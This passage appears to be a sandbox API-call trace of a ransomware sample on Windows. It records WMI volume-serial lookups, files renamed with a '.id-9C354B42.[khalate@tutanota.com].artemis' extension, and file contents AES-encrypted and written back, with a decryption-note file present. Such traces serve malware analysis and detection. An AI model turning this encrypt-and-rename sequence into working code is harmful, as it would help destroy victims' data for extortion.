pAuthnSvc=0x6cee9b4, pAuthzSvc=0x6cee9b0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac, pImpLevel=0x6cee99c, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4 | out: pAuthnSvc=0x6cee9b4*=0xa, pAuthzSvc=0x6cee9b0*=0x0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac*=0x6, pImpLevel=0x6cee99c*=0x2, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4*=0x1) returned 0x0 [0188.992] WbemLocator:IUnknown:Release (This=0x781094) returned 0x1 [0188.992] WbemLocator:IUnknown:QueryInterface (in: This=0x6748104, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee958 | out: ppvObject=0x6cee958*=0x7810b4) returned 0x0 [0188.993] WbemLocator:IUnknown:QueryInterface (in: This=0x6748104, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee954 | out: ppvObject=0x6cee954*=0x781094) returned 0x0 [0188.993] WbemLocator:IClientSecurity:SetBlanket (This=0x781094, pProxy=0x6748104, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0188.993] WbemLocator:IUnknown:Release (This=0x781094) returned 0x2 [0188.993] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x1 [0188.993] CoTaskMemFree (pv=0x77dde8) [0188.993] WbemLocator:IUnknown:Release (This=0x6737480) returned 0x0 [0189.517] WbemLocator:IUnknown:QueryInterface (in: This=0x6748104, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee554 | out: ppvObject=0x6cee554*=0x7810b4) returned 0x0 [0189.518] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee510 | out: ppvObject=0x6cee510*=0x0) returned 0x80004002 [0189.649] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee32c | out: ppvObject=0x6cee32c*=0x0) returned 0x80004002 [0189.692] WbemLocator:IUnknown:AddRef (This=0x7810b4) returned 0x3 [0189.692] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0190.110] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede1c | out: ppvObject=0x6cede1c*=0x0) returned 0x80004002 [0190.111] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede28 | out: ppvObject=0x6cede28*=0x781014) returned 0x0 [0190.111] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781014, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede30 | out: pCid=0x6cede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0190.111] WbemLocator:IUnknown:Release (This=0x781014) returned 0x3 [0190.111] CoGetContextToken (in: pToken=0x6cede88 | out: pToken=0x6cede88) returned 0x0 [0190.111] CoGetContextToken (in: pToken=0x6cede38 | out: pToken=0x6cede38) returned 0x0 [0190.111] CoGetContextToken (in: pToken=0x6cee290 | out: pToken=0x6cee290) returned 0x0 [0190.111] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee320 | out: ppvObject=0x6cee320*=0x78109c) returned 0x0 [0190.111] WbemLocator:IRpcOptions:Query (in: This=0x78109c, pPrx=0x7810b4, dwProperty=2, pdwValue=0x6cee348 | out: pdwValue=0x6cee348) returned 0x80004002 [0190.111] WbemLocator:IUnknown:Release (This=0x78109c) returned 0x3 [0190.475] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x2 [0190.475] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0190.475] CoGetContextToken (in: pToken=0x6cee7c8 | out: pToken=0x6cee7c8) returned 0x0 [0190.475] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x6cee898*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee894 | out: ppvObject=0x6cee894*=0x6748104) returned 0x0 [0190.475] WbemLocator:IUnknown:AddRef (This=0x6748104) returned 0x4 [0190.475] WbemLocator:IUnknown:Release (This=0x6748104) returned 0x3 [0190.475] WbemLocator:IUnknown:Release (This=0x6748104) returned 0x2 [0190.475] SysStringLen (param_1=0x0) returned 0x0 [0190.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67340d0, puCount=0x6ceec2c | out: puCount=0x6ceec2c*=0x0) returned 0x0 [0190.475] WbemDefPath:IWbemPath:GetText (in: This=0x67340d0, lFlags=2, puBuffLength=0x6ceec28*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec28*=0x20, pszText=0x0) returned 0x0 [0190.475] WbemDefPath:IWbemPath:GetText (in: This=0x67340d0, lFlags=2, puBuffLength=0x6ceec28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.475] CoGetContextToken (in: pToken=0x6cee898 | out: pToken=0x6cee898) returned 0x0 [0190.475] WbemLocator:IUnknown:AddRef (This=0x7810b4) returned 0x3 [0190.475] WbemLocator:IUnknown:QueryInterface (in: This=0x7810b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee72c | out: ppvObject=0x6cee72c*=0x7810b4) returned 0x0 [0190.475] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x3 [0190.476] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x2 [0190.476] WbemDefPath:IWbemPath:GetText (in: This=0x67340d0, lFlags=2, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0x20, pszText=0x0) returned 0x0 [0190.476] WbemDefPath:IWbemPath:GetText (in: This=0x67340d0, lFlags=2, puBuffLength=0x6ceec30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.476] IWbemServices:GetObject (in: This=0x6748104, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceebe4*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceebe4*=0x673c2c0, ppCallResult=0x0) returned 0x0 [0191.423] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734140, puCount=0x6ceebe4 | out: puCount=0x6ceebe4*=0x2) returned 0x0 [0191.423] WbemDefPath:IWbemPath:GetText (in: This=0x6734140, lFlags=4, puBuffLength=0x6ceebe0*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebe0*=0xf, pszText=0x0) returned 0x0 [0191.423] WbemDefPath:IWbemPath:GetText (in: This=0x6734140, lFlags=4, puBuffLength=0x6ceebe0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebe0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0191.423] IWbemClassObject:Get (in: This=0x673c2c0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3462148*=0, plFlavor=0x346214c*=0 | out: pVal=0x6ceebe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3462148*=8, plFlavor=0x346214c*=0) returned 0x0 [0191.423] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.423] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.423] IWbemClassObject:Get (in: This=0x673c2c0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3462148*=8, plFlavor=0x346214c*=0 | out: pVal=0x6ceebe8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3462148*=8, plFlavor=0x346214c*=0) returned 0x0 [0191.423] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.424] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.424] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm", lpFilePart=0x0) returned 0x34 [0191.424] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x5f [0191.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec48) returned 1 [0191.424] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), fInfoLevelId=0x0, lpFileInformation=0x6ceecc4 | out: lpFileInformation=0x6ceecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x12ae0a00, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x4480)) returned 1 [0191.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec44) returned 1 [0191.424] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Benioku.htm.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\benioku.htm.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0191.425] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0191.425] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0191.425] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0191.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecec) returned 1 [0191.426] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceed68 | out: lpFileInformation=0x6ceed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109b3760, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x109b3760, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x109b3760, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0191.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece8) returned 1 [0191.426] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x6cee808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0191.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecb4) returned 1 [0191.426] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), fInfoLevelId=0x0, lpFileInformation=0x346277c | out: lpFileInformation=0x346277c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x42ba)) returned 1 [0191.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecb0) returned 1 [0191.505] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x6cee6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0191.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebe8) returned 1 [0191.505] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x460 [0191.505] GetFileType (hFile=0x460) returned 0x1 [0191.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebe4) returned 1 [0191.505] GetFileType (hFile=0x460) returned 0x1 [0191.505] GetFileSize (in: hFile=0x460, lpFileSizeHigh=0x6ceecf0 | out: lpFileSizeHigh=0x6ceecf0*=0x0) returned 0x42ba [0191.506] ReadFile (in: hFile=0x460, lpBuffer=0x353c0ec, nNumberOfBytesToRead=0x42ba, lpNumberOfBytesRead=0x6ceec9c, lpOverlapped=0x0 | out: lpBuffer=0x353c0ec*, lpNumberOfBytesRead=0x6ceec9c*=0x42ba, lpOverlapped=0x0) returned 1 [0191.508] CloseHandle (hObject=0x460) returned 1 [0191.508] CryptAcquireContextW (in: phProv=0x6ceec3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec3c*=0x7a9970) returned 1 [0191.509] CryptGenRandom (in: hProv=0x7a9970, dwLen=0x10, pbBuffer=0x3540a6c | out: pbBuffer=0x3540a6c) returned 1 [0192.303] CryptImportKey (in: hProv=0x7a9970, pbData=0x34578cc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec0c | out: phKey=0x6ceec0c*=0x77b5b0) returned 1 [0192.303] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0192.303] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0192.303] CryptDuplicateKey (in: hKey=0x77b5b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceebfc | out: phKey=0x6ceebfc*=0x77adb0) returned 1 [0192.303] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0192.303] CryptSetKeyParam (hKey=0x77adb0, dwParam=0x4, pbData=0x34579ac*=0x1, dwFlags=0x0) returned 1 [0192.303] CryptSetKeyParam (hKey=0x77adb0, dwParam=0x1, pbData=0x3457978, dwFlags=0x0) returned 1 [0192.303] CryptEncrypt (in: hKey=0x77adb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34579bc*, pdwDataLen=0x6ceec68*=0x42c0, dwBufLen=0x42c0 | out: pbData=0x34579bc*, pdwDataLen=0x6ceec68*=0x42c0) returned 1 [0192.304] CryptEncrypt (in: hKey=0x77adb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x345bca0*, pdwDataLen=0x6ceec70*=0x0, dwBufLen=0x10 | out: pbData=0x345bca0*, pdwDataLen=0x6ceec70*=0x10) returned 1 [0192.306] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0192.306] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0192.306] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0192.306] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", nBufferLength=0x105, lpBuffer=0x6cee6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm", lpFilePart=0x0) returned 0x33 [0192.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebd4) returned 1 [0192.306] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Berime.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\berime.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0192.308] GetFileType (hFile=0x3dc) returned 0x1 [0192.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebd0) returned 1 [0192.308] GetFileType (hFile=0x3dc) returned 0x1 [0192.308] WriteFile (in: hFile=0x3dc, lpBuffer=0x346f454*, nNumberOfBytesToWrite=0x44d0, lpNumberOfBytesWritten=0x6ceec90, lpOverlapped=0x0 | out: lpBuffer=0x346f454*, lpNumberOfBytesWritten=0x6ceec90*=0x44d0, lpOverlapped=0x0) returned 1 [0192.310] CloseHandle (hObject=0x3dc) returned 1 [0192.440] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0192.440] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0192.440] CoTaskMemFree (pv=0x9825530) [0192.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0192.440] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec10 | out: ppv=0x6ceec10*=0x72015c) returned 0x0 [0192.440] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec08 | out: pAptType=0x6ceec08*=1) returned 0x0 [0192.440] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec0c | out: ppvObject=0x6ceec0c*=0x0) returned 0x80004002 [0192.440] IUnknown:Release (This=0x72015c) returned 0x1 [0192.441] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee578 | out: ppv=0x6cee578*=0x6737028) returned 0x0 [0192.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737028, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee790 | out: ppvObject=0x6cee790*=0x0) returned 0x80004002 [0192.442] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737028, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7a4 | out: ppvObject=0x6cee7a4*=0x6738c40) returned 0x0 [0192.442] WbemDefPath:IUnknown:Release (This=0x6737028) returned 0x0 [0192.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c4 | out: ppvObject=0x6cee3c4*=0x6738c40) returned 0x0 [0192.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee380 | out: ppvObject=0x6cee380*=0x0) returned 0x80004002 [0192.442] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0192.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0192.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc8c | out: ppvObject=0x6cedc8c*=0x0) returned 0x80004002 [0192.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc98 | out: ppvObject=0x6cedc98*=0x7ae460) returned 0x0 [0192.442] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae460, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedca0 | out: pCid=0x6cedca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0192.442] WbemDefPath:IUnknown:Release (This=0x7ae460) returned 0x3 [0192.442] CoGetContextToken (in: pToken=0x6cedcf8 | out: pToken=0x6cedcf8) returned 0x0 [0192.442] CoGetContextToken (in: pToken=0x6cee100 | out: pToken=0x6cee100) returned 0x0 [0192.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee190 | out: ppvObject=0x6cee190*=0x0) returned 0x80004002 [0192.443] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0192.443] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x1 [0192.443] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0192.443] CoGetContextToken (in: pToken=0x6cee9e8 | out: pToken=0x6cee9e8) returned 0x0 [0192.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738c40, riid=0x6ceeab8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeab4 | out: ppvObject=0x6ceeab4*=0x6738c40) returned 0x0 [0192.443] WbemDefPath:IUnknown:AddRef (This=0x6738c40) returned 0x3 [0192.443] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x2 [0192.443] WbemDefPath:IWbemPath:SetText (This=0x6738c40, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec38*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec38*=0x20, pszText=0x0) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceec3c | out: puCount=0x6ceec3c*=0x0) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: puResponse=0x6ceec44*=0xc19) returned 0x0 [0192.443] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738c40, uRequestedInfo=0x0, puResponse=0x6ceec44 | out: 